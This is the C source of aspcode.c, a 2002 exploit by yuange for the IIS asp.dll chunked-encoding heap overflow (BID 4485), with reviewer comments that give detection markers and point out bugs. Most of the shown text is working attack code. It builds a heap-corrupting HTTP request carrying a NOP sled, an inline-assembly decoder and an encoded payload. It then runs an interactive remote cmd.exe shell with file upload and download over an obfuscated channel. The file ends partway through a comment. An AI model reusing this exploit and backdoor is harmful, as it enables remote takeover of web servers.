/* source: http://www.securityfocus.com/bid/4485/info
 *
 * A heap overflow condition in the 'chunked encoding transfer mechanism'
 * related to Active Server Pages has been reported for Microsoft IIS
 * (Internet Information Services). This condition affects IIS 4.0 and
 * IIS 5.0. Exploitation of this vulnerability may result in a denial of
 * service or allow for a remote attacker to execute arbitrary instructions
 * on the victim host. Microsoft IIS 5.0 is reported to ship with a default
 * script (iisstart.asp) which may be sufficient for a remote attacker to
 * exploit. Other sample scripts may also be exploitable. A number of Cisco
 * products are affected by this vulnerability, although this issue is not
 * present in the Cisco products themselves.
 */

/* aspcode.c ver1.0 -- iis4.0 / iis5.0 / iis5.1 asp.dll overflow program
 * copy by yuange <[email protected]> 2002.4.24
 * (the separators between the IIS versions were mis-encoded in the original)
 */

/*
 * REVIEW NOTES (added by reviewer; the code itself is unchanged)
 *
 * This is a complete, working exploit plus an in-process backdoor for the
 * BID 4485 ASP heap overflow. It is kept as historical reference material.
 * Build and run it only against systems you own, inside an isolated lab.
 * It is a 32-bit MSVC-only program (inline _asm, _chkesp, hard-coded
 * Windows NT/2000 addresses): it does not build with GCC/Clang and will not
 * work against anything but the exact targets the addresses were taken from.
 *
 * Structure:
 *   main()            attacker-side client. Builds the HTTP request, sends
 *                     the heap-corrupting body, then acts as a terminal
 *                     for the implanted backdoor.
 *   shellcodefnlock() stage-1 decoder (inline asm). Its machine code is
 *                     lifted out of this very binary at run time.
 *   shellcodefn()     stage 2, the payload proper, also lifted from this
 *                     binary. It resolves imports by hand, hooks asp.dll's
 *                     HttpExtensionProc so that later requests whose query
 *                     string starts with "!!ko" reach it, and proxies
 *                     cmd.exe and file transfers over the ISAPI
 *                     ReadClient/WriteClient callbacks.
 *   cleanchkesp()     patches the debug-build _chkesp calls out of the
 *                     lifted code.
 *   iisput/iisget/iiscmd/iisreset/iisdie/iishelp  client-side commands.
 *   newsend/newrecv   the obfuscated transport shared by client and implant.
 *
 * Detection / handling notes, all taken from the code below:
 *   - Request line "GET /<asp file>?!!ko  HTTP/1.1". The Content-Type
 *     header is followed (before the Content-length line) by 0x1000 bytes
 *     of 0x90, the raw decoder bytes, the payload encoded into the range
 *     0x61..0x70 (two bytes per payload byte), and ~0xE000 bytes of 'A'.
 *     Content-length is 2147506431 (0x80000000+MEMSIZE-1) or, for the
 *     "winxp"/"apache" modes, 4294967295. The 0xC000-byte body is a run of
 *     16-byte fake heap-chunk records. The implant later answers with the
 *     literal marker "XORDATA"; a keystream reset is acknowledged with
 *     "xordatareset".
 *   - The "encryption" of the command channel is a fixed-seed keystream
 *     (state = state*0x100 % 19999999, key byte = state % 0x100, seeded
 *     from 13579139). Anyone holding this file can decode a capture of it;
 *     treat it as obfuscation, not confidentiality. state*0x100 also
 *     overflows a 32-bit int, so the scheme relies on MSVC's wrap-around
 *     behaviour being identical on both ends.
 *   - The client is itself unsafe against a hostile peer: it reads input
 *     with gets(), writes a NUL one byte past several receive buffers
 *     (recvbuff[k]=0 / buff[k]=0 / buff[j]=0 with k,j up to the buffer
 *     size), and never checks socket, CreateFile or GetFileSize results.
 */

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma comment(lib,"ws2_32")

//#define RETEIPADDR eipwin2000
#define FNENDLONG 0x08          /* length of the NOP marker (fnendstr) searched for in lifted code */
#define NOPCODE 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
#define RETEIPADDRESS 0x468
#define SHELLBUFFSIZE 0x800     /* payload-side I/O buffer */
#define SHELLFNNUMS 14
#define DATABASE 0x61           /* nibble encoding: each payload byte becomes two bytes DATABASE+hi, DATABASE+lo */
#define DATAXORCODE 0x55
#define LOCKBIGNUM 19999999     /* keystream modulus */
#define LOCKBIGNUM2 13579139    /* keystream seed */
#define MCBSIZE 0x8
#define MEMSIZE 0xb200
#define SHELLPORT 0x1f90 //0x1f90=8080
#define WEBPORT 80

void shellcodefnlock();
void shellcodefnlock2();
void shellcodefn(char *ecb);
void shellcodefn2(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
void iiscmd(int fd,char *str);
/* NOTE(review): declared without a prototype but defined and called with (int fd, char *str). */
void iisreset();
void iisdie();
void iishelp();
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);

/* Client-side transport state: set to 1 once the implant's "XORDATA" marker
 * has been seen, after which newrecv() decodes everything it receives. */
int xordatabegin;
/* Keystream state: lockintvar1 decodes received data, lockintvar2 encodes sent data. */
int lockintvar1,lockintvar2;
char lockcharvar;

/*
 * Attacker-side client.
 *
 *   argv[1]  target host (optionally "scheme://host/..."; the prefix and
 *            anything after the first slash are stripped)
 *   argv[2]  .asp file to request (default "default.asp")
 *   argv[3]  TCP port (default 80)
 *   argv[4]  "winxp" or "apache" selects alternate Content-length / body layout
 *   argv[5]  "cn" | "sp0" | "msvcrt" | "sp2" selects the return-address table
 *            (only assigned to eipexceptwin2000add; its uses are commented out)
 *   argv[6]  value for the HOST: header (default: the target host)
 *
 * With fewer than two arguments the host and file are read interactively
 * with gets().
 *
 * Flow: connect, lift the decoder and payload out of this process image,
 * build the request, send it, then wait for the "XORDATA" marker and drop
 * into a line-oriented shell that forwards commands to the implant.
 */
int main(int argc, char **argv)
{
    char *server;
    /*
     * Import/string table shipped to the implant. Each NUL-terminated name
     * is resolved in order with GetProcAddress into the FARPROC locals of
     * shellcodefn(); an entry starting with \x09 is a DLL name passed to
     * LoadLibraryA instead; an empty entry ends the table. After it come
     * the literal strings the payload uses ("cmd.exe", "\r\nexit\r\n",
     * "XORDATA", "xordatareset"). "strend" only marks the end for the
     * client-side copy loop and is not sent.
     */
    char *str="LoadLibraryA""\x0""CreatePipe""\x0"
              "CreateProcessA""\x0""CloseHandle""\x0"
              "PeekNamedPipe""\x0"
              "ReadFile""\x0""WriteFile""\x0"
              "CreateFileA""\x0"
              "GetFileSize""\x0"
              "GetLastError""\x0"
              "Sleep""\x0"
              "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0"
              "\x09""asp.dll""\x0""HttpExtensionProc""\x0"
              "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0"
              "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
              "XORDATA""\x0""xordatareset""\x0"
              "strend";
    // char buff0[]="TRACK / HTTP/1.1\nHOST:";
    char buff1[]="GET /";
    char buff2[]="default.asp";
    char *buff2add;
    /* Query string marker. As a little-endian int the bytes "!!ko" read
     * 'ok!!', which is what the implant compares against. */
    char buff3[]="?!!ko ";
    char buff4[]=" HTTP/1.1 \nHOST:";
    char buff5[]="\nContent-Type: application/x-www-form-urlencoded";
    char buff51[]="\nTransfer-Encoding:chunked";        /* unused: its strcat is commented out below */
    char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // 0x80000000+MEMSIZE-1
    char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff
    /*
     * Fake 16-byte heap-chunk record: 8 header bytes, then what look like
     * the free-list flink (0x7ffdf01c, inside the PEB on these systems) and
     * blink (0x01002120, inside the request buffer). NOTE(review): the
     * write-4 that unlinking such a chunk performs is presumably how the
     * payload address gets planted; confirm against the target's heap.
     */
    char buff7[]=
        "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
    char buff11[]=
        "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
    char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
    /* buff9/buff8 supply, per record index k<=6, the low bytes patched into
     * buff7[0xc] and buff7[0x8]. buff8 begins with opcode bytes
     * (81 ec = sub esp,imm32; ff e4 = jmp esp; 90 = nop). */
    char buff9[]=
        "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
    char buff8[]=
        "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    /*
    char buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01";
    char buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01";
    char buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01";
    char buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01";
    char buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01";
    char buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01";
    */
    /* Eight NOPs: the marker that delimits the lifted functions in this image. */
    char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    char SRLF[]="\x0d\x0a\x00\x00";
    /* Return-address candidates for various Windows builds. Only the
     * pointer assignment below survives; every use is commented out. */
    char *eipexceptwin2000add;
    char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; ret address
    char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; ret address
    char eipexceptwin2000[]="\x80\x70\x97\x74";
    // char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; // call ebx address
    char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78";
    char eipexceptwin2000sp2[]="\x02\xbc\x01\x78";
    // char eipexceptwin2000[]="\x0B\x08\x5A\x68";
    // char eipexceptwin2000[]="\x32\x8d\x9f\x74";
    char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; ret address
    // char eipexceptwinnt[] ="\x2e\x01\x01\x78"; // call esi address
    // char eipexcept2[]="\xd0\xae\xdc\x77";
    char buff[BUFFSIZE];            /* outgoing request, later the shell line buffer */
    char recvbuff[BUFFSIZE];
    char shellcodebuff[BUFFSIZE];   /* raw lifted stage-2 code + string table */
    char shellcodebuff2[BUFFSIZE];  /* NOP sled + decoder + encoded stage 2, appended to the headers */
    struct sockaddr_in s_in2,s_in3;
    struct hostent *he;
    char *shellcodefnadd,*chkespadd;
    unsigned int sendpacketlong,buff2long,shelladd,packlong;
    int i,j,k,l,strheadlong;
    unsigned char temp;
    int fd;
    u_short port,port1,shellcodeport;
    SOCKET d_ip;                    /* holds an IPv4 address, not a socket */
    WSADATA wsaData;
    int offset=0;
    int OVERADD=RETEIPADDRESS;
    int result;

    fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
    fprintf(stderr,"\n copy by yuange 2002.4.24.");
    fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
    fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
    fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n", argv[0]);
    buff2add=buff2;

    /* Interactive fallback. NOTE(review): gets() has no bound; recvbuff and
     * shellcodebuff are BUFFSIZE but a longer line still overflows them. */
    if(argc <2){
        fprintf(stderr,"\n please enter the web server:");
        gets(recvbuff);
        for(i=0;i<strlen(recvbuff);++i){ if(recvbuff[i]!=' ') break; }
        server=recvbuff;
        if(i<strlen(recvbuff)) server+=i;
        fprintf(stderr,"\n please enter the .asp filename:");
        gets(shellcodebuff);
        for(i=0;i<strlen(shellcodebuff);++i){ if(shellcodebuff[i]!=' ') break; }
        buff2add=shellcodebuff+i;
        printf("\n .asp file name:%s\n",buff2add);
    }

    /* Target-build selection; eipexceptwin2000add is never used afterwards. */
    eipexceptwin2000add=eipexceptwin2000;
    // printf("\n argc%d argv%s",argc,argv[5]);
    if(argc>5){
        if(strcmp(argv[5],"cn")==0) {
            eipexceptwin2000add=eipexceptwin2000cn;
            printf("\n For the cn system.\n");
        }
        if(strcmp(argv[5],"sp0")==0) {
            eipexceptwin2000add=eipexceptwin20002;
            printf("\n For the sp0 system.\n");
        }
        if(strcmp(argv[5],"msvcrt")==0) {
            eipexceptwin2000add=eipexceptwin2000msvcrt;
            printf("\n Use msvcrt.dll JMP to shell.\n");
        }
        if(strcmp(argv[5],"sp2")==0) {
            eipexceptwin2000add=eipexceptwin2000sp2;
            printf("\n Use sp2 msvcrt.dll JMP to shell.\n");
        }
    }

    result= WSAStartup(MAKEWORD(1, 1), &wsaData);
    if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
                        "to the Internet at the time that "
                        "this program was launched, or you "
                        "do not have a 32-bit "
                        "connection to the Internet.");
        exit(1);
    }

    /*
    if(argc>4){
        offset=atoi(argv[4]);
    }
    // OVERADD+=offset;
    // packlong=0x10000-offset+0x8;
    if(offset<-0x20||offset>0x20){
        fprintf(stderr,"\n offset error !offset -32 --- +32 .");
        gets(buff);
        exit(1);
    }
    */

    if(argc <2){
        // WSACleanup( );
        // exit(1);
    }
    else server = argv[1];

    /* Normalise the host: skip leading blanks, drop a "scheme://" prefix,
     * and cut the string at the first slash or backslash (argv is modified
     * in place). */
    for(i=0;i<strlen(server);++i){ if(server[i]!=' ') break; }
    if(i<strlen(server)) server+=i;
    for(i=0;i+3<strlen(server);++i){
        if(server[i]==':'){
            if(server[i+1]=='\\'||server[i+1]=='/'){
                if(server[i+2]=='\\'||server[i+2]=='/'){
                    server+=i;
                    server+=3;
                    break;
                }
            }
        }
    }
    for(i=1;i<=strlen(server);++i){
        if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
    }

    d_ip = inet_addr(server);
    if(d_ip==-1){
        he = gethostbyname(server);
        if(!he) {
            WSACleanup( );
            printf("\n Can't get the ip of %s !\n",server);
            gets(buff);
            exit(1);
        }
        else memcpy(&d_ip, he->h_addr, 4);
    }

    if(argc>3) port=atoi(argv[3]);
    else port=WEBPORT;
    if(port==0) port=WEBPORT;

    /* NOTE(review): socket() result is not checked; 8000 ms receive timeout. */
    fd = socket(AF_INET, SOCK_STREAM,0);
    i=8000;
    setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
    s_in3.sin_family = AF_INET;
    s_in3.sin_port = htons(port);
    s_in3.sin_addr.s_addr = d_ip;
    printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
    if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) {
        closesocket(fd);
        WSACleanup( );
        fprintf(stderr,"\n connect err.");
        gets(buff);
        exit(1);
    }

    /*
     * Locate the real body of the MSVC debug-build stack check _chkesp so
     * that cleanchkesp() can patch calls to it out of the lifted code.
     * If the function symbol points at a 0xE9 (jmp rel32) thunk --
     * presumably the incremental-linking jump table -- follow it.
     * The two-instruction asm block appears to exist only to make the
     * compiler reference _chkesp; its result is unused.
     */
    _asm{
        mov ESI,ESP
        cmp ESI,ESP
    }
    _chkesp();
    chkespadd=_chkesp;
    temp=*chkespadd;
    if(temp==0xe9) {
        ++chkespadd;
        i=*(int*)chkespadd;
        chkespadd+=i;
        chkespadd+=4;
    }

    /*
    shellcodefnadd=shellcodefnlock;
    temp=*shellcodefnadd;
    if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
    }
    for(k=0;k<=0x500;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
    }
    */

    /* ---- build the request line ---------------------------------------- */
    memset(buff,NOPCODE,BUFFSIZE);
    /*
    strcpy(buff,buff0);
    if(argc>6) strcat(buff,argv[6]);
    else strcat(buff,server);
    strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n");
    strcat(buff,buff1);
    */
    strcpy(buff,buff1);
    strheadlong=strlen(buff);
    OVERADD+=strheadlong-1;
    if(argc>2) buff2add=argv[2];
    /* Strip leading slashes from the .asp path (buff1 already ends in '/'). */
    for(;;++buff2add){
        temp=*buff2add;
        if(temp!='\\'&&temp!='/') break;
    }
    // printf("\nfile:%s",buff2add);
    buff2long=strlen(buff2add);
    strcat(buff,buff2add);
    // fprintf(stderr,"\n offset:%d\n",offset);
    // offset+=strheadlong-strlen(buff1);
    /*
    for(i=0x404;i<=0x500;i+=8){
        memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);   // 0x2d sub eax,num32
        memcpy(buff+offset+i+4,eipexceptwin2000add,4);
    }
    if(argc>5){
        if(strcmp(argv[5],"sp2")==0) {
            memcpy(buff+offset+i,"\x58",1);
        }
    }
    for(i=0x220;i<=0x380;i+=8){
        memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);   // 0x2d sub eax,num32
        memcpy(buff+offset+i+4,eipexceptwinnt,4);
    }
    for(i=0x580;i<=0x728;i+=8){
        memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);   // 0x2d sub eax,num32
        memcpy(buff+offset+i+4,eipexceptwinnt,4);
    }
    */
    // winnt 0x2cc or 0x71c win2000 0x130 or 0x468
    // memcpy(buff+offset+i+8,exceptret,strlen(exceptret));

    /*
     * ---- lift stage 1 (the decoder) out of this process image ----------
     * shellcodefnlock() starts with eight NOPs; skip them (k+8) and copy
     * 0x100 bytes of its body to shellcodebuff2+0x1004, i.e. after a
     * 0x1000-byte NOP sled.
     */
    shellcodefnadd=shellcodefnlock;
    temp=*shellcodefnadd;
    if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
    }
    for(k=0;k<=0x500;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
    }
    memset(shellcodebuff2,NOPCODE,BUFFSIZE);
    i=0x1000;
    memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);

    /*
     * ---- lift stage 2 (shellcodefn) ------------------------------------
     * Copy the function up to its trailing NOP marker, neutralise the
     * _chkesp calls, and append the string table (everything in str before
     * "strend").
     */
    shellcodefnadd=shellcodefn;
    temp=*shellcodefnadd;
    if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
    }
    for(k=0;k<=BUFFSIZE;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
    }
    // k+=0x
    memcpy(shellcodebuff,shellcodefnadd,k); //j);
    cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
    for(j=0;j<0x400;++j){
        if(memcmp(str+j,"strend",6)==0) break;
    }
    memcpy(shellcodebuff+k,str,j);
    sendpacketlong=k+j;

    /*
     * Nibble-encode stage 2 into 0x61..0x70 and write it over the decoder's
     * own trailing NOP marker ("shell:" label), which is where the decoder
     * expects its input. A NUL a few bytes later terminates the C string
     * so the strcat below appends ~0xE000 bytes of 'A' after it.
     */
    for(k=0;k<=0x200;++k){
        if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
    }
    for(j=0;j<sendpacketlong;++j){
        temp=shellcodebuff[j];
        // temp^=DATAXORCODE;
        shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
        ++k;
        shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
        ++k;
    }
    j=i+k;
    j=j%8+3;
    shellcodebuff2[i+j+k]=0;
    // j=strlen(shellcodebuff2)%8+3;
    for(j=0;j<=0xe000;j+=4){
        strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32
        // strcat(shellcodebuff2,eipexceptwin2000cn);
    }
    /*
    strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\x90");
    for(j=0;j<=0xb00;j+=4){
        strcat(shellcodebuff2,"\x90\x90\x90\x2d");   // 0x2d sub eax,num32
    }
    */
    // printf("\nbuff:%s",buff);
    printf("\n shellcode long 0x%x\n",sendpacketlong);

    /* ---- assemble the headers ------------------------------------------
     * Order: GET /<file>, "?!!ko " marker (a blank in apache mode), HTTP
     * version + HOST:, Content-Type, then the whole sled/decoder/payload
     * blob (still inside the header block), then Content-length + CRLFCRLF.
     */
    if(argc>4&&strcmp(argv[4],"apache")==0){
        strcat(buff," ");
    }
    else strcat(buff,buff3);
    printf("\n packetlong:0x%x\n",sendpacketlong);
    strcat(buff,buff4);
    if(argc>6) strcat(buff,argv[6]);
    else strcat(buff,server);
    strcat(buff,buff5);
    if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
    else strcat(buff,shellcodebuff2);
    // strcat(buff,buff51);
    if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
        printf("\n for %s system\n",argv[4]);
        strcat(buff,buff61);
    }
    else strcat(buff,buff6);
    // printf("\n send buff:\n%s",buff);
    /*
    i=strlen(buff);
    memset(buff+i,'a',0xc000);
    memset(buff+i+0xc000-strlen(buff7),0,1);
    strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
    */
    // strcpy(buff8,buff7);
    /*
    temp=buff7[5];
    temp-=offset*0x10;
    buff7[5]=temp;
    i=*(int *)(buff7+4)+2;
    printf("\nSEH=0x%x\n",i);
    */
    /*
    for(i=0;i<8;++i){
        temp=buff7[i];
        printf("%2x",temp);
    }
    */
    /*
    for(i=0;i<0xc000/0x10;++i){
        strcat(buff,buff7);
    }
    */
    // printf("\nbuff=%s\n",buff);
    // strcat(buff,"\r\n");
    // printf("\n send buff:\n%s",buff);
    // strcpy(buff+OVERADD+NOPLONG,shellcode);
    sendpacketlong=strlen(buff);
    // printf("buff:\n%s",buff+0x10000);
    /*
    #ifdef DEBUG
    _asm{
        lea esp,buff
        add esp,OVERADD
        ret
    }
    #endif
    */

    /* Seed the transport keystream (the implant seeds identically). */
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    xordatabegin=0;

    /* Runs once: the inner loop reuses i and leaves it at 0xC000. */
    for(i=0;i<1;++i){
        j=sendpacketlong;
        // buff[0x2000]=0;
        fprintf(stderr,"\n send packet %d bytes.",j);
        // gets(buff);
        send(fd,buff,j,0);

        /*
         * ---- body: 0xC000 bytes of 16-byte fake chunk records ----------
         * Records before offset j (MEMSIZE+0x10, or 0x18 in winxp mode) are
         * plain copies of buff7; from j on, every MCBSIZE*8 bytes the
         * link-pointer low bytes are taken from buff8/buff9 (k<=6), and
         * after that buff11 is used.
         */
        buff7[0]=MCBSIZE;
        j=MEMSIZE+0x10;
        i=0;
        if(argc>4&&strcmp(argv[4],"winxp")==0) {
            j=0x18;
            i=8;
        }
        for(k=0;i<0xc000;i+=0x10){
            if(i>=j) {
                k=((i-j)/(MCBSIZE*8));
                if(k<=6){
                    memcpy(buff7+0x8,buff10,8);
                    buff7[0x8]=buff8[k];
                    buff7[0xc]=buff9[k];
                }
                else memcpy(buff7,buff11,0x10);
            }
            memcpy(buff+i,buff7,0x10);
        }
        if(argc>4&&strcmp(argv[4],"apache")==0){
            /* apache mode: overwrite the tail with CRLFs and send once. */
            for(k=0xb000;k<=0xc000;k+=2) {
                memset(buff+k,0x0d,1);
                memset(buff+k+1,0x0a,1);
            }
            buff[0xc000]=0;
            // for(k=0;k<0x10;++k)
            send(fd,buff,0xc000,0);
            // printf("\nbuff:%s\n",buff);
        }
        else send(fd,buff,0xc000,0);

        /* Blocking mode; wait for the implant's "XORDATA" marker, echoing
         * anything else received (e.g. an ordinary HTTP error). */
        k=0;
        ioctlsocket(fd, FIONBIO, &k);
        j=0;
        while(j==0){
            k=newrecv(fd,recvbuff,BUFFSIZE,0);
            if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
                xordatabegin=1;
                fprintf(stderr,"\n ok!recv %d bytes\n",k);
                recvbuff[k]=0;   /* NOTE(review): one past the end when k==BUFFSIZE */
                // printf("\n recv:%s",recvbuff);
                // for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int *)(recvbuff+8+4*j));
                k=-1;
                j=1;
            }
            if(k>0){
                recvbuff[k]=0;
                fprintf(stderr,"\n recv:\n %s",recvbuff);
            }
        }
    }

    /* ---- interactive shell over the implant ------------------------------
     * Non-blocking socket. k<0 means "prompt for a line": local "iis*"
     * commands are handled here, anything else is sent (XOR-encoded) as a
     * line for the remote cmd.exe. Received data is decoded and echoed.
     */
    k=1;
    ioctlsocket(fd, FIONBIO, &k);
    // fprintf(stderr,"\n now begin: \n");
    /*
    for(i=0;i<strlen(SRLF);++i){
        SRLF[i]^=DATAXORCODE;
    }
    send(fd,SRLF,strlen(SRLF),0);
    send(fd,SRLF,strlen(SRLF),0);
    send(fd,SRLF,strlen(SRLF),0);
    */
    k=1;
    l=0;
    while(k!=0){
        if(k<0){
            l=0;
            i=0;
            while(i==0){
                gets(buff);   /* NOTE(review): unbounded read into buff */
                if(memcmp(buff,"iish",4)==0){ iishelp(); i=2; }
                if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); i=2; }
                if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); i=2; }
                if(memcmp(buff,"iiscmd",6)==0){ iiscmd(fd,buff+6); i=2; }
                if(memcmp(buff,"iisreset",8)==0){ iisreset(fd,buff+6); i=2; }
                if(memcmp(buff,"iisdie",6)==0){ iisdie(fd,buff+6); i=2; }
                if(i==2)i=0;   /* local command handled: prompt again */
                else i=1;      /* plain text: fall through and send it */
            }
            k=strlen(buff);
            memcpy(buff+k,SRLF,3);
            // send(fd,SRLF,strlen(SRLF),0);
            // fprintf(stderr,"%s",buff);
            /*
            for(i=0;i<k+2;++i){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
                // buff[i]^=DATAXORCODE;
            }
            send(fd,buff,k+2,0);
            */
            newsend(fd,buff,k+2,0);
            // send(fd,SRLF,strlen(SRLF),0);
        }
        k=newrecv(fd,buff,BUFFSIZE,0);
        if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
            xordatabegin=1;
            k=-1;
        }
        if(k>0){
            // fprintf(stderr,"recv %d bytes",k);
            /*
            if(xordatabegin==1){
                for(i=0;i<k;++i){
                    lockintvar1=lockintvar1*0x100;
                    lockintvar1=lockintvar1%LOCKBIGNUM;
                    lockcharvar=lockintvar1%0x100;
                    buff[i]^=lockcharvar;   // DATAXORCODE;
                }
            }
            */
            l=0;
            buff[k]=0;   /* NOTE(review): one past the end when k==BUFFSIZE */
            fprintf(stderr,"%s",buff);
        }
        else{
            /* No data: poll up to 20 times (k forced to 1), then k<0 from
             * the failed recv drops us back to the prompt. */
            Sleep(20);
            if(l<20) k=1;
            ++l;
        }
        // if(k==0) break;
    }
    closesocket(fd);
    WSACleanup( );
    fprintf(stderr,"\n the server close connect.");
    gets(buff);
    return(0);
}

/*
 * Stage-1 decoder. Never called as a C function: main() copies the bytes
 * between the two 8-NOP markers into the request and the target executes
 * them. Position independent:
 *   - call getediadd / pop edi      -> edi = our own address (next2)
 *   - mov esp,edi / and esp,...     -> move the stack onto a known, aligned
 *                                      spot just below the code
 *   - call getshelladd              -> pushes the address of "shell:" as the
 *                                      return address of stage 2; push 0x01
 *                                      then becomes stage 2's argument (ecb)
 *   - esi = edi = address of shell: -> the encoded data main() wrote over
 *                                      the trailing NOPs
 *   - looplock                      -> reads pairs of bytes (DATABASE+hi,
 *                                      DATABASE+lo), rebuilds the byte and
 *                                      stores it in place (output is half
 *                                      the input so it never overtakes the
 *                                      read pointer); a NUL byte ends the
 *                                      loop and jumps to the decoded code.
 */
void shellcodefnlock()
{
    _asm{
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        jmp next1
    getediadd:
        pop edi
        mov esp,edi
        and esp,0xfffff0f0
        jmp next2
    getshelladd:
        push 0x01
        mov eax,edi
        inc eax
        inc eax
        inc eax
        inc eax
        inc eax
        mov edi,eax
        mov esi,edi
        // sub sp,8
        xor ecx,ecx
    looplock:
        lodsb
        cmp al,cl
        jz shell
        sub al,DATABASE
        mov ah,al
        lodsb
        sub al,DATABASE
        shl ah,4
        add al,ah
        // lea eax,ptr word [edx*4+al]
        stosb
        jmp looplock
    next1:
        call getediadd
    next2:
        call getshelladd
    shell:
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
    }
}

/*
 * Stage 2: the resident backdoor. Compiled here, copied byte-for-byte into
 * the request by main(), and executed inside inetinfo.exe. It is entered
 * two ways:
 *   1. from the decoder right after the overflow, with ecb == 1 (the dummy
 *      pushed by stage 1) -- reading *ecb faults, the SEH handler installed
 *      below resumes execution, and the "install hook" path runs;
 *   2. from the "door" stub after the hook is in place, with a genuine
 *      EXTENSION_CONTROL_BLOCK whose lpszQueryString starts with "!!ko"
 *      (thedoor==1).
 *
 * Everything after the hook is a cmd.exe proxy: stdin/stdout go through
 * two anonymous pipes and the ISAPI ReadClient/WriteClient callbacks from
 * the ECB, XOR-obfuscated with the same keystream as newsend/newrecv.
 * Commands recognised (after decoding, first bytes of the received block):
 *   "iisc <cmd>"        kill cmd.exe, start <cmd> instead (goto iiscmd)
 *   "reset"             answer "xordatareset", re-seed the keystream
 *   "iisrr"             kill cmd.exe, zero the door's fall-through target,
 *                       sleep forever (NOTE(review): the next ordinary ASP
 *                       request then jumps to 0 -- the "iisdie" effect)
 *   "put " <4-byte len> <name at +8>   receive a file
 *   "get " <name>       send "size"+4-byte length, then the file
 *   anything else       written to cmd.exe's stdin
 *
 * Stack layout trick: apifnadd[] is declared with one element and indexed
 * 1..17; the writes land in the FARPROC locals declared just above it, in
 * reverse declaration order, which exactly matches the order of the string
